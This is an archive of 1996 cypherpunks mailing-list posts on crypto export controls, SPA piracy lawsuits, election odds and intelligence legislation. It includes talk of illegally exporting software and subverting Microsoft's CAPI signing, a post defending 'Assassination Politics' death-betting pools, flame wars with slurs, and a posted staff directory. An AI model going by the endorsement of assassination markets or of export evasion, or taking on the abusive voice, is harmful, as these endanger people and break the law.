Content-Type: text/plain


>Jim Bell <jimbell@pacifier.com> writes:
>> At 08:49 AM 10/11/96 +0100, Adam Back wrote:
>> >  [...].  Microsoft's CAPI arrangement is that they will not
>> >  sign non-US CAPI compliant crypto modules (Examples of enforcement of
>> >  no-hooks interpretation).
>>
>> Does that fix the "export only the signature" problem (for the
>> government)/opportunity (for the rest of us)?   You know, present Microsoft
>> with the software, don't tell them it's already out of the US, and they sign
>> it.  Export the signature only  (who cares if this is legal!) and edit the
>> international software to contain the signature.
>
>Export the lot, signature included :-)
>
>(I doubt exporting only the signature once the story came out would
>offer you any more protection legally than exporting the software).
>
>As you say who cares if it's illegal: things get exported all the
>time.
>
>The problem however, is finding a non-US site to hold the hot potato
>once it has been exported.  For example 128 bit Netscape beta was
>exported a while ago.  I don't see it on any non-US sites.  This is
>due to Netscape's licensing requirements, you need a license to be a
>netscape distribution site, the license doesn't include the right to
>mirror non-exportable versions on non-US sites.
>

That's one good application for remailers, and .warez newsgroups. at.

>If the exported software is `PGP3.0 for CAPI' or whatever, I think it
>should be fair to conclude it will be cheerfully mirrored by all, and
>Phil Zimmermann won't be complaining.  (PGPfone is on ftp.ox.ac.uk,
>plus other places, for example.)  So yes, I agree, for software with
>appropriate distribution licenses.
>
>Another approach, which has been discussed lately is the use of a
>patch to usurp Microsoft as the signatory for CAPI modules.  I wonder
>what Microsoft would say about an unauthorised patch, to fix an ITAR
>induced `bug' in windows.  Bill Gates doesn't sound pro-GAK.  If they
>aren't going to complain, perhaps such patches could be distributed
>widely outside the US also.
>
>The new owner of the CAPI signatory key would need a good reputation,
>and presumably a policy of signing any (non-GAKked) CAPI modules
>signed by microsoft, and anything else that anyone wants signed.
>

An excellent suggestion.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Pekelney <pekelney@rspeng.com>
Date: Sat, 12 Oct 1996 09:18:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: WW II Crypto. History
Message-ID: <v03007800ae8582d60b14@[140.174.162.103]>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

Those interested in WW II Cryptolographic History should check out:

www.maritime.org/ecm2.shtml

I have just updated this site to include more information on the ECM Mark
II, aka SIGABA, aka CSP-889.  This was the primary high level US cipher
system from 1941 - 1959 or so when it was gradualy retired because it was
too slow.  The web site now includes a history of the machine, textual
description of its algorithm, photographs, and a Java program (with source)
that emulates the machine in detail.

Comments and suggestions for the site are greatfully accepted at
pekelney@rspeng.com. I am also seeking help improving the UI if anyone is
very Java literate and wants to help. I do not regularly monitor
cypherpunks because of its incredibly high volume of traffic.

Thanks,

rich

--
Richard Pekelney
Internet: pekelney@rspeng.com
Phone: 1-415-563-5928
Fax: 1-415-563-5787






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPYRUS <gweissman@spyrus.com>
Date: Sat, 12 Oct 1996 09:08:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto: Systems & Application Developers Wanted
Message-ID: <325F68C7.6F29@spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain


SPYRUS, the leading provider of cryptographic tokens (PC cards & 
     Smart Cards), with associated systems and applications software, is 
     looking for engineers with the following qualifications to work 
with
     our Secure Applications Group in San Jose, CA:
     
     *  5 or more years experience in systems and applications software 
     design and implementation in C and C++.  Assembler experience 
     desired.
     
     * Minimum 3 years experience with Windows development including 
device 
     drivers and VxD's, using Microsoft and Borland compilers, NuMega 
     tools, etc.   Windows MFC, NT kernel, and Unix (any versions) 
     experience desirable.  Mac experience a plus.
     
     * Cryptographic and other security software expertise highly 
     desirable.
     
     
     Gregg Weissman
     SPYRUS
     San Jose, CA
     Voice: 408-432-8180 x225
     Fax: 408-432-8415
     
     email ASCII resume to:
     gweissman@spyrus.com
     - or - 
     msutherland@spyrus.com

     see the SPYRUS page at http://www.spyrus.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: the prisoner <the_village@null.gov>
Date: Sat, 12 Oct 1996 09:14:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Prove it in Court First
In-Reply-To: <3.0b19.32.19961012103434.00760128@panix.com>
Message-ID: <325F6A2E.3869@null.gov>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> >From the Software Publisher's Association Code of Conduct for ISPs:
> 
> "It is also a violation of the copyright owner's rights for an ISP to post,
> or to allow others to use its server(s) to post, materials, like serial
> numbers or cracker utilities, that make it possible for others to execute
> and use pirated software.  Such acts, which either induce or materially
> contribute to copyright infringement by someone else, constitute
> contributory infringement, and expose ISPs to the same liability for
> damages, penalties and injunctive relief as a direct infringer."
> 

/\    /\

This is supposed to have a legal basis?

Duncan, it's even easier. Here ya go:

1. Buy a copy of Windows 95.
2. Install it on a machine.
3. Install it on a second machine.

There, SPA: you can now go sue every ISP from which every reader of
this list obtains their mail.  They have just published information 
on how to pirate Windows '95.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: the prisoner <the_village@null.gov>
Date: Sat, 12 Oct 1996 09:22:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: write to SPA re: suit against C2 et. al.
Message-ID: <325F6C04.7B77@null.gov>
MIME-Version: 1.0
Content-Type: text/plain


If you haven't read it yet, read the press release
on their page at www.spa.org, and see how they'd
like to 

1. impose prior restraint on speech, and 
2. turn ISPs into little police organizations, doing SPA's will.

I think it's time for a little outrage.
============================================================================

SPA Contacts
                                                                                  
Mailing Addresses: 
 1730 M St. NW, Suite 700
 Washington, DC 20036-4510
 tel: (202) 452-1600
 fax: (202) 223-8756 

 Anti-Piracy Hotline: (800) 388-7478
 Fax On Demand Service: (800) 637-6823
                                                          57 Rue Pierre Charron
                                                          75008 Paris France
                                                          tél: 33-(1) 45-63-02-02
                                                          Fax: 33-(1) 45-63-02-31




     President Ken Wasch, ext. 310, kwasch@spa.org 
          Arnita Grose, Executive Assistant, ext. 309, agrose@spa.org 

     Anti-Piracy 
          Sandra Sellers, VP of Intellectual Property Education and Enforcement, ext. 311, ssellers@spa.org 
          Peter Beruk, Director of Domestic Anti-Piracy, ext. 314, pberuk@spa.org 
          Joshua Bauchner, Litigation Coordinator, ext. 323, jbauchner@spa.org 
          Shevon Desai, International Coordinator, Latin America, ext. 348, sdesai@spa.org 
          Michael Flynn, Litigation Assistant, ext. 366, mflynn@spa.org 
          Francine Foster, International Public Relations Coordinator, ext. 394, ffoster@spa.org 
          Elisha Lawrence, Director of Asia/Pacific Anti-Piracy, ext. 378, elawrence@spa.org 
          Jim Nyberg, Litigation Coordinator, ext. 315, jnyberg@spa.org 
          Rudolfo Orjales, Director of Latin American Anti-Piracy, ext. 375, rorjales@spa.org 
          Rebecca Sills, International Coordinator, Europe, ext. 344, rsills@spa.org 
          Monica Slade, CPC Assistant, ext. 344, mslade@spa.org 

     Communications 
          Kathleen Rakestraw, Communications Manager, ext. 321, krakestraw@spa.org 
          Cheryl Benson, Graphic Designer, ext. 355, cbenson@spa.org 
          Daniel Coonley, Senior Graphic Designer, ext. 350, dcoonley@spa.org 

     Conferences 
          Tina Hochberg, Director of Conferences, ext. 318, thochberg@spa.org 
          Rebecca Howland, CSM Marketing Coordinator, ext. 367, bhowland@spa.org, csminfo@spa.org 
          Nadia Kader, Meetings Assistant, ext. 339, nkader@spa.org 
          Maria Santos, Meeting Planner, ext.328 msantos@spa.org 

     Finance/Administration 
          Tom Meldrum, Vice President of Finance and Administration, ext. 324, tmedrum@spa.org 
          Julie Maynard, Accounts Receivable Accountant, ext. 331, jmaynard@spa.org 
          Dawn DeVillasana, Marketing Specialist, ext. 388, ddevillasana @spa.org 
          Debra McGinnis, Accounting Manager, ext. 351, dmcginnis@spa.org 
          Andrey Drachenko, Fulfillment Clerk, ext. 353, adrachenko@spa.org 
          Jim Hassert, Director of Information Services, ext. 340, jhassert@spa.org, 
          Sandy Meadows, Fulfillment Coordinator, ext. 341, smeadows@spa.org 
          Natasha Soldatchenkova, Fulfillment Assistant, ext. 333, natashas@spa.org 
          Katrina Hunt, Office/Personnel Manager, ext. 312, kstyles@spa.org 
          Kia Williams, Receptionist, ext. 300, kwilliams@spa.org 

     Government Affairs 
          David Byer, Director of Government Affairs, ext. 325, dbyer@spa.org 
          Jonathon Agmon, Government Affairs Legal Advisor for Intellectual Property and Trade Policy, ext. 325, 
dbyer@spa.org 
          Erika Barnes, Public Policy Coordinator, ext. 335, ebarnes@spa.org 
          Letreze Gooding, Government Affairs Assistant, ext. 362, lgooding@spa.org 
          Melinda Griffith, State Policy Manager, ext. 337, mgriffith@spa.org 
          David LeDuc, Government Affairs Assistant, ext. 352, dleduc@spa.org 
          Mark Nebergall, Vice President and Counsel, ext. 319, mnebergall@spa.org 
          Mark Traphagen, Vice President and Counsel, ext. 322, mtraphagen@spa.org 

     Marketing
          Kay Heiberg, Marketing Manager, ext. 361, kheiberg@spa.org 
          Barbara Young, Marketing Coordinator, ext. 326, byoung@spa.org

     Membership Services 
          Glenn Ochsenreiter, VP Marketing and Membership Services, ext. 327, glenno@spa.org 
          Mandy Braun Strum, Consumer Section Manager, ext. 313, mbstrum@spa.org 
          Sue Kamp, Director, Education Section, ext. 354, skamp@spa.org 
          Daniel Gonzalez, Web Assistant, ext. 377, dgonzalez@spa.org, 
          Alexis H. Tatem, MPC Marketing Manager, ext. 330, atatem@spa.org, mpcinfo@spa.org 
          Sara White, Special Projects Manager, ext. 343, swhite@spa.org 
          Marnel Williams, Sections Administrative Assistant, ext. 369, mwilliams@spa.org 

          Jeffrey Espiritu, Membership Coordinator, ext. 338, jespiritu@spa.org 
          Anika Valentine, Membership/Marketing Adminstrator, ext. 317, avalentine@spa.org

     Public Relations 
          David Phelps, Director of Public Relations, ext. 320 dphelps@spa.org 
          Loni Singer, Public Relations Assistant, ext. 353, lsinger@spa.org 

     Research 
          James Sanders, Director of Research, ext 373, jsanders@spa.org 
          Anne Griffith, Research Analyst, Business Section Manager, ext. 360, agriffith@spa.org 
          Lainie Tompkins, Research Analyst, ext. 316, ltompkins@spa.org 



SPA EUROPE 

     Gérard Gabella, Managing Director 
     Viviane Coisy, Manager of Anti-Piracy/Public Policy 
     Eric Daubie, Manager of Business Development 
     Perry de Gastines, Manager of Business Development




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 12 Oct 1996 10:05:14 -0700 (PDT)
To: attila <attila@primenet.com>
Subject: Re: is there no end to AP & Creative Wiretap Arguments?
Message-ID: <v02130504ae85133a7ab2@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>        after months of patient explanations to Jim Bell and
>    sympathizers, going over the same points in 31 flavours,
>    the same arguments of what I would call "respectable" anarchy
>    (well stated by Tim May) rather than the "world at war" anarchy of
>    Jim Bell --  where are we?!?
>
>        I read Jim's first "manifesto" at least 18 months ago; and, the
>    "refined manifsto" less than a month ago.  I have yet to see an
>    application of civilization which brings AP society up to even the
>    level of Tombstone AZ just prior to the OK Corral.

How about as a means of coercing war criminals ethnic purgers, as those in
Bosnia/Serbia, to turn themselves in to proper tribunals for judging.
Having AP bettors wager $100,000s on your untimely retirement, unless you
turn yourself in, could induce one to consider conventional justice.

I find it appalling the duplicity of world government leaders which talk
frequently of world justice but are only prepared to expend real effort to
catch the few terrorists attacking their citizens, while those who commit
genocide on other are given half-hearted slaps of the hand and told not to
sin again, or less through government inaction.

>
>        Jim's theories all hinge on betting pools which supposedly can
>    be run like the lottery where the poor can share a ticket
>    (egalitarian, of course), anonyminity (which as an argument is
>    appropriate, but what for in a selfish immoral act?),  and a
>    justice is served attitude, even if there are mistakes.

Just think of it as a sportsbook with different games and players.  You
wouldn't accuse bettors of trying to influence the outcome a football game
would you?  :-)

>
>        the whole concept of AP does not even support the concept of
>    "justice is expeditiously served!"   it is a resort to the manners
>    of dogs and monkeys sitting at the same table --a spiteful,
>    arrogant player can move the betting pools to assassinate anyone.
>
>        In other words, are we planning to use James Caan as the lead
>    runner in "Roller Ball"  --except this time we're playing with a
>    "live" society for which we hold in common the utmost contempt?
>
>        are we trying to return to the bread and circus mentality of
>    Rome on its deathbed and slide to subjecation by Attila the Hun
>    who was actually stopped from sacking Rome after the Pope so
>    impressed him with his regal robes....  deciding  tribute from an
>    established dictatorship was more reliable?  --and less costly?!?
>

No, I see it as another possible means of encouraging justice in a world
where the largest criminals are often beyond the reach of the world
community due to 'political complications'.

>        has anyone seen a single social moral fiber in Jim's often
>    passionate arguments for AP, or even in the "results" in a society
>    which will never breed another leader: religious, secular, or even
>    political?
>
>        does AP permit anything except slaves and drones which can
>    just as easily be replaced by robots?  maybe noone will miss news
>    reports (as 'canned' as they are), or movies which entertain or
>    provoke?  or ice cream sundaes at the soda fountain?
>
>        ...and the disappearance of grocers, and doctors, and dentists
>    bringing forth a new age of subsistence farming and hunting for
>    the lucky few who might live to a readjusted live expectancy point
>    of 30 yrs, burning books and computer printouts for cooking and
>    warmth.
>
>        why have books or knowledge when there is noone willing to
>    accept the responsibility of educating your children, the instructor
>    waiting for the parent of Dumb Suzy to avenge her failing grade?
>    after all, Suzy does not need to read, not even well enough to
>    take the test for a driver's license --there is no infrastructure;
>    no need to learn math well enough to possibly balance a checkbook
>    --after all, there are no banks...

I think AP, or its ilk, may be a likely outcome in a would unable or
unwilling to apply justice even-handedly no matter what a person's station.
It's a popular rebellion to encourage the 'legal' world justice system to
have more backbone and care less about politics or risk being marginalized.

>        "Assassination Politics" is nothing more than a childish game
>    which 'legalizes' killing anyone you wish.  are AP's proponents so
>    naive they believe the bookies will not have any public person
>    assassinated by rigging the pools for their own profit?

Mathematically verifiable safeguards would need be developed so that this
is minimized or eliminated as a possibility before any sportsbooks, what
ever the sport, operate.  This is a function the community of cypherpunks
and professional crypto and security people should serve.

>remember, law enforcement ceased with the return of 'law of the jungle'
>anarchy.

All human rights are Naturally derived as are the 'Laws of the Jungle'.
Governments instituted among men should derive their rights from the
soverignty of its citizens.  Unfortunately, many countries choose to ignore
this.  AP should serve an occassionally competitive system to keep the
'duly consistuted' system on its toes lest those in authority reap the law
of the jungle.





PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Sat, 12 Oct 1996 12:27:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anonymous oddsman
Message-ID: <199610121431.KAA01789@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for repeats, & please repost where appropriate.

Well, now Ladbroke House is not even selling Clinton, and he has gone
up from 1:8 to 1:10 at William Hill, while Dole fell a bit more, and
just *look* at the William Hill Perot odds, doubling from last time!
Whee!

Wide disparity there, as Ladbroke's is still holding steady at 50:1 on
the little guy, now that they're offering him again. Still no odds yet
from Coral, and the nym's giving troubles, and still no offer -- or
official explanation for the lack of odds -- on Harry Browne. I suppose
folks can keep speculating, still seems like easy money for the house
to the oddsman.

    Prices @ 09:20 BST Sat. 11th Oct 96
+---------+----------------+----------------+
|         |  Ladbroke's    | William Hill   |
+---------+----------------+----------------+
| Clinton |   No bets      |      1:10      |
| Dole    |     7:1        |     11:2       |
| Perot   |    50:1        |    500:1       |
| Browne  |    Still not currently offered. |
+---------+----------------+----------------+
|         |                |                |
| Phone   | +44-800-524524 | +44-800-444040 |
| Numbers:|                |                |
+---------+----------------+----------------+

Our roving reporter had the following to say:

   "Looks like you're getting trouser-brain back !      :-)"

I suppose so, we get the government we deserve. The oddsman wishes to
thank all involved, and he is still looking for a Moscow correspondent
for possible UK arbitrage opportunities. :> Thanks also to all who are
"in the know" for not revealing my identity. 'Till next time.
anonymous oddsman

"Demeaning the integrity of the U.S. Presidential election process
for you on a regular basis, at no charge."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Oct 1996 07:41:11 -0700 (PDT)
To: kwasch@spa.org
Subject: Prove it in Court First
Message-ID: <3.0b19.32.19961012103434.00760128@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the Software Publisher's Association Code of Conduct for ISPs:

"It is also a violation of the copyright owner's rights for an ISP to post,
or to allow others to use its server(s) to post, materials, like serial
numbers or cracker utilities, that make it possible for others to execute
and use pirated software.  Such acts, which either induce or materially
contribute to copyright infringement by someone else, constitute
contributory infringement, and expose ISPs to the same liability for
damages, penalties and injunctive relief as a direct infringer."

Here is how you violate the copyright of the book "Unix for Dummies" :

1)  Get copy of book
2)  Go to copy machine
3)  Copy the book

I hereby demand that you copraphageous cretins sue me immediately for
providing this information.

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Oct 1996 07:55:53 -0700 (PDT)
To: Greg Broiles <cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <3.0b19.32.19961012104722.00ebf54c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 PM 10/11/96 -0700, Greg Broiles wrote:
>
>It's inappropriate to expect Sameer or any other C2
>employee/agent/representative to discuss the suit before they've had a
>chance to find and meet with an attorney; in some circumstances it might
>never be prudent for them to make a public statement about the suit. 

Is this good advice?  When attacked, isn't it good to offer as strong a
defense as possible including (but not limited to) verbal abuse, physical
confrontations, countersuits, standing outside people's houses, picketing,
letters, public appearances, urging other people to express their views, etc.

What is lost by a complete defense.  If you develop a nasty reputation,
people eventually leave you alone.  It doesn't even hurt you in court.  See
for example the new Milos Forman film "The People vs. Larry Flynt."  In
spite of Larry's tactics, Justice Rhenquist gave him the unanimous decision
he wanted from the Supremes.

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sat, 12 Oct 1996 10:54:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Elliptic curves
Message-ID: <199610121754.KAA04861@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May's father, an idiot, stumbled across Tim May's
mother, an imbecile, when she had no clothes on. Nine
months later she had a little moron.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 12 Oct 1996 11:25:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LET'S MEET DIMITRI
In-Reply-To: <yqXmVD1w165w@bwalk.dm.com>
Message-ID: <m27mowavgo.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Dimitri" == Dimitri Vulis KOTM <dlv@bwalk.dm.com> writes:

Dimitri> Zach, I don't think you've been on this list long enough to
Dimitri> realize that Timmy started flaming me for no apparent reason,
Dimitri> and lying about me, and attributing to me various shit I
Dimitri> never said. I'm just pointing out that he's a liar and a
Dimitri> generally despicable net.scum.

>From the cypherpunks memory division.

Tim's message:

X-From-Line: cypherpunks-errors@toad.com  Tue Aug 27 23:54:53 1996
Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by deanna.miranova.com (8.7.5/8.6.9) with ESMTP id XAA23346 for <steve@miranova.com>; Tue, 27 Aug 1996 23:54:53 -0700
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id WAA11091 for cypherpunks-outgoing; Tue, 27 Aug 1996 22:56:59 -0700 (PDT)
Received: from you.got.net (root@scir-gotnet.znet.net [207.167.86.126]) by toad.com (8.7.5/8.7.3) with ESMTP id WAA11086 for <cypherpunks@toad.com>; Tue, 27 Aug 1996 22:56:57 -0700 (PDT)
Received: from [205.199.118.202] (tcmay.got.net [205.199.118.202]) by you.got.net (8.7.5/8.7.3) with SMTP id WAA01052 for <cypherpunks@toad.com>; Tue, 27 Aug 1996 22:57:07 -0700
Date: Tue, 27 Aug 1996 22:57:07 -0700
X-Sender: tcmay@mail.got.net
Message-Id: <ae492e2b01021004ff49@[205.199.118.202]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Lines: 35
Xref: deanna.miranova.com cypherpunks:3651

At 4:26 AM 8/28/96, Dr.Dimitri Vulis KOTM wrote:
>Senile tcmay@got.net (Timothy C. May) rants:
>> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road to
>> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
>> profound influence on me, and on many others.
>
>But he's fucking unreadable.  I plan to teach economic this semester and
>make every student read Hazlitt (economics in 1 lesson). I can't force them
>to read hayek (or Rothbard) because they're fucking unreadable. Shit.

Well, to one who inserts "(spit)" after nearly every name he cites, and
critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek must indeed
seem unreadable. Shit.

After all, Hayek rarely writes things like: "The senile Von Mises (spit)
and his Sovok Cabal plotters...."

As to "forcing" your students to read Hayek, just who is in charge? If
you're the instructor, they can choose to read what you tell them to read,
or be unprepared on the exams you give and possibly flunk the class. What
part of "Required Reading" do you or your students not understand?

--Tim (spit) May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

And Vulis' response:

X-From-Line: cypherpunks-errors@toad.com  Wed Aug 28 22:13:01 1996
Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by deanna.miranova.com (8.7.5/8.6.9) with ESMTP id WAA00376 for <steve@miranova.com>; Wed, 28 Aug 1996 22:13:00 -0700
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id VAA07932 for cypherpunks-outgoing; Wed, 28 Aug 1996 21:12:03 -0700 (PDT)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id VAA07921 for <cypherpunks@toad.com>; Wed, 28 Aug 1996 21:11:52 -0700 (PDT)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA14701 for ; Thu, 29 Aug 96 00:01:11 -0400
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 28 Aug 96 19:36:40 EDT
	for cypherpunks@toad.com
To: cypherpunks@toad.com
Subject: Re: Hayek (was: Cato Institute conference on Net-regulation)
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Message-Id: <8a0DTD20w165w@bwalk.dm.com>
Date: Wed, 28 Aug 96 19:19:30 EDT
In-Reply-To: <ae492e2b01021004ff49@[205.199.118.202]>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Lines: 47
Xref: deanna.miranova.com cypherpunks:3729

Senile tcmay@got.net (Timothy C. May) (fart) rants:

> At 4:26 AM 8/28/96, Dr.Dimitri Vulis KOTM wrote:
> >Senile tcmay@got.net (Timothy C. May) rants:
> >> Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road t
> >> Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
> >> profound influence on me, and on many others.
> >
> >But he's fucking unreadable.  I plan to teach economic this semester and
> >make every student read Hazlitt (economics in 1 lesson). I can't force them
> >to read hayek (or Rothbard) because they're fucking unreadable. Shit.
>
> Well, to one who inserts "(spit)" after nearly every name he cites, and
> critiques Hayek as "fucking unreadable. Shit.," I suppose Hayek must indeed
> seem unreadable. Shit.

Are you jealous, Tim )fart)? You're just a senile old fart, not worth my
spittle. I make you feel better I'll put (fart) after you stupid name. Shit.

> After all, Hayek rarely writes things like: "The senile Von Mises (spit)
> and his Sovok Cabal plotters...."

Senile Tim May (fart) exposes himself as a liar by attributing to me shit
I've never said (Pidor Vorobiev's forgeries). Please stop polluting this
mailing list with your lies and personal attacks.

> As to "forcing" your students to read Hayek, just who is in charge? If
> you're the instructor, they can choose to read what you tell them to read,
> or be unprepared on the exams you give and possibly flunk the class. What
> part of "Required Reading" do you or your students not understand?

It's been many years since Tim May (spit) has been to college, hasn't it?
I don't blackmail my students into doing the work they don't want to do
by blackmailing them with grades. When I taught comp.sec., I said from the
start that everyone gets an A, and I trust tgen to be motivated enough to
read everything I _suggest_ they read. And they all did a great job and
earn3d their A's.

Senile Tim May (fart) is a fucking statist asshole.

Fuck you and fuck your criminal Arm*nian grandparents.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps



-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Oct 1996 08:42:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Intel RICO Billed
Message-ID: <1.5.4.16.19961012154043.2d97cf66@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, October 12, 1996, p. A6.


   Clinton Approves Intelligence Spending Rise

      Bill Is Also Signed to Make Theft of Trade Secrets a
      Federal Crime


   President Clinton signed a bill yesterday that boosts
   intelligence agency spending and another that makes theft
   of trade secrets a federal crime.

   Clinton said he signed the 1997 Intelligence Authorization
   Act despite objections to three provisions, including one
   that establishes three new assistant directors of central
   intelligence under CIA Director John M. Deutch.

   Although the nation's intelligence budget is an official
   secret, it is reported to total about $30 billion for the
   1997 fiscal year, up 4.9 percent from 1996.

   In a statement, Clinton said he would support Deutch in
   asking the next Congress to repeal the provision that
   created assistant directors for intelligence collection,
   analysis and administration. "I share his concern that
   these provisions will add another layer of positions
   requiring Senate confirmation" without a corresponding
   increase in the CIA director's authority to manage the
   intelligence agencies, Clinton said.

   The bill: 

   + Gives the FBI power to subpoena local telephone records.

   + Authorizes the CIA and the National Security Agency to
   collect data on foreign citizens abroad for U.S.
   investigations.

   + Requires Senate confirmation of the CIA's general
   counsel. That is meant to prevent political influence over
   a position designed to block illegal covert operations.

   + Prohibits federal employment of senior intelligence
   officials for three years after their departure from
   government.

   It also prohibits the CIA from using American journalists
   as spies. But the restriction could be waived in
   extraordinary circumstances and the CIA still could have
   its agents pose as journalists. The bill would not prohibit
   journalists who choose to provide information from doing
   so.

   Clinton also signed into law the Economic Espionage Act of
   1996, saying it strengthens protections against theft or
   misuse of proprietary business information. "It will help
   us crack down on acts like software piracy and copyright
   infringement that cost American businesses billions of
   dollars in lost revenues," he said. The law makes the theft
   of trade secrets a federal crime and provides financial
   penalties and prison sentences for specific acts of
   economic espionage. It also preserves the confidentiality
   of trade secrets in court proceedings.

   Clinton said the measure also eliminates gaps in the
   criminal laws that cover attacks against computers and the
   information they contain.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 12 Oct 1996 09:02:54 -0700 (PDT)
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: PGP implements Key Recovery today!
In-Reply-To: <199610100740.IAA00270@server.test.net>
Message-ID: <199610121706.MAA19462@homeport.org>
MIME-Version: 1.0
Content-Type: text


Adam Back wrote:

| I guess if you do get an RSA key for the NSA, then you can choose an
| email for them to put on the PGP keyid:
| 
| 	NSA <dirnsa@nsa.gov>

bigbrother@dockmaster.ncsc.gov

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 12 Oct 1996 10:36:28 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Prove it in Court First
In-Reply-To: <3.0b19.32.19961012103434.00760128@panix.com>
Message-ID: <Pine.BSF.3.91.961012122723.19692C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Yup. Who died and left the SPA in charge?

-r.w.

On Sat, 12 Oct 1996, Duncan Frissell wrote:

> >From the Software Publisher's Association Code of Conduct for ISPs:
> 
> "It is also a violation of the copyright owner's rights for an ISP to post,
> or to allow others to use its server(s) to post, materials, like serial
> numbers or cracker utilities, that make it possible for others to execute
> and use pirated software.  Such acts, which either induce or materially
> contribute to copyright infringement by someone else, constitute
> contributory infringement, and expose ISPs to the same liability for
> damages, penalties and injunctive relief as a direct infringer."
> 
> Here is how you violate the copyright of the book "Unix for Dummies" :
> 
> 1)  Get copy of book
> 2)  Go to copy machine
> 3)  Copy the book
> 
> I hereby demand that you copraphageous cretins sue me immediately for
> providing this information.
> 
> DCF
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <Ross.Wright@adnetsol.com>
Date: Sat, 12 Oct 1996 12:36:32 -0700 (PDT)
To: steve@miranova.com>
Subject: Re: LET'S MEET DIMITRI
